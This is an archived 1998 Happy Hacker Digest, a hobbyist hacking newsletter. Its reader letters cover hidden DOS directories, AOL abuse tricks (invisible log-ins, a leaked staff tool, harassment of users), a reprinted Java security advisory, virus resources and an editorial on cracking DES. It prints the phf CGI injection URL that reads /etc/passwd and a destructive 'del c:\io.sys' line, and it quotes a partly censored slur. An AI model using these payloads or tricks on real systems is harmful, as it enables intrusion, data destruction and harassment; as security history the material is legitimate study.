What's New!

Chat with
Hackers

How to Defend
Your Computer 

The Guides
to (mostly) 
Harmless Hacking

Happy Hacker 
Digests (old stuff) 

Hacker Links 

Hacker
Wargames 

Meet the 
Happy Hacksters 

Help for 
Beginners 

Hacker 
Bookstore 

Humor 

It Sucks 
to Be Me!

How to Commit
Computer Crime (not)! 

What Is a 
Hacker, Anyhow? 

Have a 
Great Life! 

News from the 
Hacker War Front

Carolyn's most
popular book,
in 4th edition now!

For advanced
hacker studies,
read Carolyn's
Google Groups
Subscribe to Happy Hacker
Email:
Visit this group

July 27, 1998

=====================================================================

=====================================================================
URL of the day: http://www.avolio.com/tracing.html Tracing Email...
See back issues of the Happy Hacker Digest and Guides to (mostly)
Harmless Hacking at http://www.Happyhacker.org.
GTMHH en espanol: http://underhack.islatortuga.com
Svenska:http://w1.340.telia.com/~u34002171/hhd/gtmhh/svenska/hhdsvensk.html
=====================================================================

TABLE OF CONTENTS

* RE: Hiding directories
* AOL exploit
* Re: GTMHH: Part 2, Intro to Computer Viruses
* New Java Security Flaw Found
* The little black book of computer viruses
* RE: VBScript Exploit (What Microsoft [allegedly] had to say.)
* Good encryption/decryption mailing list
* URL for Virus Info
* Old school techniques
* Editorial: Snap, Crackle - Cracked!

==================================================================
 *** RE: Hiding directories
==================================================================
From: "Nils van den Heuvel" <n.heuvel@wxs.nl>

> From: "Stephen Nicholas (AKA: Elfshadow)" <Elfshadow@innocent.com>>
> To Happy Hacker>
> In regards to Thomason's <midas@pacbell.net> letter in the June 23rd edition,
> Thomason was talking about how he had a bunch of directories that he couldnt
> delete, move, or get any access to, either through dos OR win95.
> Then it goes on to explain by using Ascii char ALT - 255 (null) you
> can make a directories that can be hidden etc..>
> Well, I have found a way around it. There is a neat little dos program called
> 'X-Tree Gold', it is a fairly old program, made a while back. This program
> CAN view, edit, rename, delete, and otherwise manipulate directories with
> an ALT 255 (Or any ascii chars) in the name!!

Well, that's pretty cool, but all the DOS + WIN '95 tools work on it
too...  and it isn't really invisible... look what it says when you
do a "dir /ad" (ok, I edited it a little to make me look 31337):

 Het volume in station C heeft geen naam.
 Het volumenummer is 3764-1E03.
 Directory van C:\.

LINUX  <DIR> 17-04-98  16:55 linux
KERNEL  <DIR> 05-06-98  17:28 kernel
PHRACK  <DIR> 10-07-98  16:47 phrack
   <DIR> 15-07-98  12:00
          0 bestand(en)              0 bytes.
       126 dir('s)      2.447.863.808 bytes beschikbaar.

(sorry, I have a dutch version of w '95)
see that line that says
"   <DIR> 15-07-98  12:00" ???

That's the ALT-255 directory, you can enter it by typing "cd <ALT-255>"
where <ALT-255> is the character that's generated by typing 255 on the
numeric keypad while pressing the ALT button...
All of the DOS + W'95 commands accept the <ALT-255> character, so
you can deltree it, rd it, etc....

Very funny, Scotty. Now beam down my clothes!
===================================================================
 *** AOL exploit
===================================================================
From: "Tiberian Son" <TiberianSon@Erols.Com>
 

Hello, Happy Hackers everywhere!

Since the magazine has sunk to a new low by mentioning AOL hacks <G>, I
decided to go let some other people know about AOL.  I started out on AOL.
It used to be trying to phish an overhead account here and there (AOLese for
"superuser" or "root"), or going and dropping a mijilion messages into
someone's e-mail box.  Any person with visual basic can do it.  Well, then
came UTILITYS to do it! YES, utilitys that ran under a GUI and were USABLE
to blow up chatrooms, type in ascii codes, and kick people offline with an
exploit in the IM programming that overloaded their soundcards, locked up
AOL, and crashed their computers!  Well, and I take my hat off to Suzbik for
mentioning this, it was found that AOL would store your passowrds in
plaintext!  Well the problem is that people like, er, people <G> can get at
this and use it!  'Nuff said.

Another neat AOL trick is "ghosting".  It doesn't ghost your text, but it
ghosts YOU!  It is really computer dependant (the more upgrades your AOL
software has gone through, the better, and if you have a really old copy of
AOL, the best!), but it is nice because you can call the 800 number, and the
server won't see you, so it won't...  What you do is dial into AOL (a futile
effort), and connect.  When it says "checking password" at the bottom of
that window, press space (or hit cancel).  Now, dial again, and complete the
process.  NOTE:  DON'T CHANGE WHERE YOU ARE DIALING INTO, BECAUSE IT'S THE
DAILUP COMPUTER YOU ARE AFFECTING!  If all goes well, try to IM yourself.
It should return "User is offline".  Whoo hoo!  Now, you can lurk in
chatrooms and not show up on the room occupant list, and might have access
to some new keywords (you have to hit or miss this one, it comes and goes in
regards to keyword access).

After that, ghosting became fun (IM your worst enemy, taunting the hell out
of them, and they can't TOS you because, heck, YOUR OFFLINE!), but it wasn't
enough!  We needed blood!  The blood of the heretic Steve Case!  Well, we
all ran about, searching for more AOL hacks.  About that time, some
disgruntled staff member released his set of tools that made him a staff
member.  People tried to keep it under wraps, but couldn't, because he
apparently went into all the piracy rooms (piracy is real popular on AOL due
to non-disclosure and privacy agreements make you invincible on it, try
private room "Fate", "FateX", or those with an ascenidng number on them,
such as "Fate1", or "FateX1"), and mass mailed it to everyone!  Whoo hoo!
Well, everyone who tried to use it couldn't, because AOL checks your
account, and nicely deletes them for you when it finds you.  So along comes
a guy, who figures a way around this procees (and most people have given up,
from all the virii floating around in false mailings of these things), and
HE distributes it to the masses completed.

AOL is orgainised by a series of INVOKES, or numbers assigned to the windows
of areas.  Most of these invokes cannot be used at the keyword prompt, but,
just as example, we can see some of AOL's hypocracy and lies.  At the
keyword prompt, type "upgrade".  Opt for the AOL 4 upgrade/Beta Test.  Oops,
you can't use it because you use Internet Explorer 4.0!  Oops!  I am
conecting to AOL on my Linux box and use Mosiac!  Hmmm...  Now try keyword
"Beta".  You should be told you don't have access to this area!  I wonder
what is in beta?  Try keyword "aol://1722:macbeta".  Note the INVOKE number
in there!  It should get you into the area where you can download AOL 4,
becuase they are LYING TO THE PUBLIC about IE4.  In fact, they encourage
using IE4 in the beta area!  If you can't get in, try ghosting and then get
in.  Again, it seems to be software specific.  There is a beta test form at
keyword "beta", but they have been denying that too since the tests are so
overloaded.

Now, what was that about the staff tool?  Well, no-one really knows if it is
just another internet myth, or if it was real, but either way, it works.  To
use it, YOU MUST HAVE AOL 3.0 FOR WINDOWS 3.1 INSTALLED.  I installed mine
into "C:\AOL31\", just for the purpose of using this.  It installs a "*"
menu to your toolbar in AOL (if you use it on the win95 version, you go
boom!), and from there, explore!  It has some text files documenting some
invokes (but I think you will have much more fun exploring the system!) and
some text documents explinging the stuff inside it.  Double click on
Run1st.exe to install it initially, and then on Run2nd.exe to mask the tools
form AOL.  Since you have them, on a lark, install them but don't click on
Run2nd.exe and watch as AOL cleans out the master tools (have the ZIP on
disk!).  As usual, use at your own risk.

I send all this to you in good company.  If I thought you could hit the CRIS
server (the server for managing the accounts), I wouln't send it to you
(tell me if you do, I am interested).  Second, a point of interest:
RainMan.  You've seen the movie, now play the AOL utility!  What RainMan
does is that is allows AOL staff to change their areas (for refrence, it was
the very tool used by hackers running the very same program to change the
caption of the OJ Simpson trial to "It's a picture of a f***ing n***er!").
I never had the balls to try it.  Again, if you do try it, tell me what
happens.  The Rainman command set invokes should also be in there, but I
haven't had the occiasion to hack AOL in a loooooooong while.  If you follow
the invokes to "the secret staff area", and this is amusing, you'll
eventually hit upon a message board from '93, and it is interesting reading
(it no longer works, the area was created by hackers, and AOL never caugh
on, or maybe they did, it's in ruins now, and is barely intelligable, but
scattered crys still haunt it).  Second:  AOLSpy can be used to get invokes
from windows.  Sometimes they work, other times not.  If an invoke doesn't
work at first, try it agian in five miutes.  Sometimes they can be clogged,
since the invoke system was never intended for navigation, from what I
understand.

Mail me at TiberianSon@Erols.com with any questions.

"Peace upon you, my brothers.  May we someday meet face to face, and unite
together."

Laters, the Tiberian Son
==================================================================
 *** Re: GTMHH: Part 2, Intro to Computer Viruses
==================================================================
From: Matt Vollmar <matt@matt.sapien.net>

I am curious if you actually tried this "virus". According
to Sun Microsystems, you cannot access system properties on which an
applet is running...this, fortunately, turns out to be true, as
the "applet" that is mentioned in this article is not even an
"applet"...it is, however, an application, which MUST be run from
the command line. This means that a person must purposely download
the java byte-code, download the "homer.sh", and then run it with
a command like "java Homer". I would recommend trying to run this
from the web...it will do absolutely nothing but cause the Java
interpreter in Netscape to say:

Applet Homer can't start: exception: java.lang.ClassCastException:

Homer is not an applet

Thank God for reality...who knows what kind of havoc might result
if you had actually been right...it's a good thing Sun usually does
what they say they will do.

Note:  The virus was not even written as an applet, which is obvious
from the code to anyone familiar with Java.

-- Matt Vollmar
==================================================================
 *** New Java Security Flaw Found
==================================================================
(The following is reprinted from the Bugtraq email list, to subscribe to
Bugtraq, email LISTSERV@NETSPACE.ORG with message "subscribe bugtraq")
From: Gary McGraw <gem@RSTCORP.COM>

Hello all,
Princeton's Safe Internet Programming Team recently announced the
discovery of a serious Java security hole that can be leveraged into
an attack applet.  Their description follows:
------------------------------------------------------------------------
We have found another Java security flaw that allows a malicious applet
to disable all security controls in Netscape Navigator 4.0x.  After
disabling the security controls, the applet can do whatever it likes on
the victim's machine, including arbitrarily reading, modifying, or
deleting files.  We have implemented a demonstration applet that deletes
a file.

This flaw, like several previous ones, is in the implementation of the
"ClassLoader" mechanism that handles dynamic linking in Java.  Despite
changes in the ClassLoader implementation in JDK 1.1 and again in JDK
1.2 beta, ClassLoaders are still not safe; a malicous ClassLoader can
still override the definition of built-in "system" types like
java.lang.Class.  Under some circumstances, this can lead to a
subversion of Java's type system and thus a security breach.

The flaw is not directly exploitable unless the attacker can use some
other secondary flaw to gain a foothold.  Netscape 4.0x has such a
secondary flaw (a security manager bug found by Mark LaDue), so we were
able to demonstrate how to subvert Netscape's security controls.  We are
not aware of any usable secondary flaws in Microsoft's and Sun's current
Java implementations, so they appear not to be vulnerable to our attack
at present.

Please direct any inquiries to Edward Felten at (609) 258-5906 or
felten@cs.princeton.edu.

Dirk Balfanz, Drew Dean, Edward Felten, and Dan Wallach
Secure Internet Programming LabDepartment of Computer Science
Princeton Universityhttp://www.cs.princeton.edu/sip
==================================================================
 *** The little black book of computer viruses
==================================================================
From:ALPHA60 (alpha60@usa.net)

Hi!

I just thought you'd want to tell everyone on the HH list that they
can download "the little black book of computer viruses" by Mark A.
Ludwig for free from:

 http://www.ummah.net/hackers/download/bbbv.zip

The book is in the public domain.

Keep up the good work,
ALPHA60
==================================================================
 *** RE: VBScript Exploit (What Microsoft [allegedly] had to say.)
==================================================================
From: "Ben Wright" <witchdoctor_98@hotmail.com>

Happy Hackers,

In response to the message posted by <VM370x@aol.com>:

I contacted a friend at Microsoft and he said that "Microsoft" felt it
was up to the users to use their common sense in the matter but
nonetheless he did recognise it to be a substantial problem. In relation
to the comment about appending del c:\io.sys to autoexec.bat I
understand that it would return an Access Denied error, although I'm
sure it isn't to difficult to figure out a workaround ;o) - (I haven't
been able to test this so don't go trying it!)

Thanks all,
Ben.

(P.S. Is there any chance what so ever of having a Win95/98 box such as
the Unix ones used in the Happy Hacker Wargames)

[Dale: Got one to spare???]
==================================================================
 *** Good encryption/decryption mailing list
==================================================================
From: "BOB AUGER" <bobin_69@hotmail.com>

Carolyn,

I recently came upon a good encryption/decryption mailing list that may
come in handy to you or your subscribers.
(Not really good for newbies)
:(

To subscribe to the list, send a message to:
   <crypto-gram-subscribe@chaparraltree.com>:
To remove your address from the list, send a message to:
   <crypto-gram-unsubscribe@chaparraltree.com>:
=================================================================
 *** URL for Virus Info
=================================================================
From: "Nancy Nancy" <nancy_nancy@mailexcite.com>

The following URL contains lots of info on viruses. It's frequently updated
and sometimes has a tutorial on writing viruses.

http://www.codebreakers.org
=================================================================
 ***  Old school techniques
=================================================================
From: SERIALMONKEY

I was just wondering why you guys haven't mentioned this age old school
technique in one of your news letters to the newbies....

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

or

/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
 

(example: type one of the above, after a servers name....and with a little
suerte, you might get some thing like this: /usr/local/bin/ph -m alias=x\
/bin/cat /etc/passwd)

I have had some rather interesting results with this in the past, and still
everyonce-and-awhile get something back like "smile your on candid camera"
or a big ASCII middle finger.
 

OXOXOX,
SERIALMONKEY

[Carolyn: This is the phf exploit.  It almost never works any more.  If your
ISP catches you using it, you might get kicked off your account.]

=================================================================
 *** Editorial: Snap, Crackle - Cracked!
=================================================================
From Dale Holmes <editor@cmeinel.com>

I was making myself breakfast this morning when I saw it. I don't mind
telling you that breakfast is my favorite meal of the day and I take
great pride in my breakfast making abilities. Sometimes I pour the milk
right into the center of the bowl, other times I pour it gently around
the side. While pouring my milk this morning, however, I was distracted
by a television commercial. The voice on TV said "The European
cryptography industry has one word for the US Government - Thanks!"

I laughed so hard I spilled milk all over the table. I knew what they
meant. They were referring to the HUGE debate in the US over its
encryption export policy. The US government controls the export of
encryption software, and has long argued that 56-bit DES encryption
was sufficiently secure that it was made the US standard in 1977.
It has limited exports of software using DES technology to 40-bit keys.
The government has argued that cracking 56-bit DES would require such
an investment in time and money that is was nearly impossible. Yeah, right!

The Electronic Frontier Foundation (EEF), a civil liberties advocacy
group, built a machine that cost $210,000, made from "old" technology,
that successfully broke 56-bit DES encryption in less than 3 days.
They have written a book about how it was done, entitled "Cracking DES:
Secrets of Encryption Research, Wiretap Politics, and Chip Design",
available now from O'Reilly and Associates. I suggest you buy it today!

Soon, if not already, every enemy that the US government fears will
have the technology to crack 56-bit DES, and they will be doing so.
US companies that build encryption into their products will no longer
be able to compete in the global marketplace - nobody in their right
mind will buy 56-bit DES now that they know how weak it is.

Most businesses outside the United States are using 128-bit encryption.
American companies are too, but only here in the US. Now that the EFF
has demonstrated how simple and cheap it is to crack the US encryption
standard, look for the US crypto policy debate to really heat up. The
TV ad that I saw this morning was a call for citizens to get involved
in the debate. Once the ad was over, I looked down and noticed the spilled
milk all over my table.

There is no sense crying over spilled milk, but the current US crypto
policy, well, that is another matter...
__________________________________________________________________

 
 

This is a list devoted to *legal* hacking! If you plan to use any
information in this Digest or at our Web site to commit crime, go away!
Foo on you! Happy Hacker is a 501 (c) (3) tax deductible organization
in the United States operating under Shepherd's Fold Ministries. Yes!
This is all a plot to save your immortal souls!

For Windows questions, please write Roger Prata<rprata@cmeinel.com>;
for Macs, write Strider <Strider@clarityconnect.com>,
and Unix, write Josh Fritsch <derr@txdirect.net>
Happy Hacker Digest editor: Dale Holmes <editor@cmeinel.com>

Happy Hacker Grand Pooh-bah: Carolyn Meinel <>

 © 2013 Happy Hacker All rights reserved.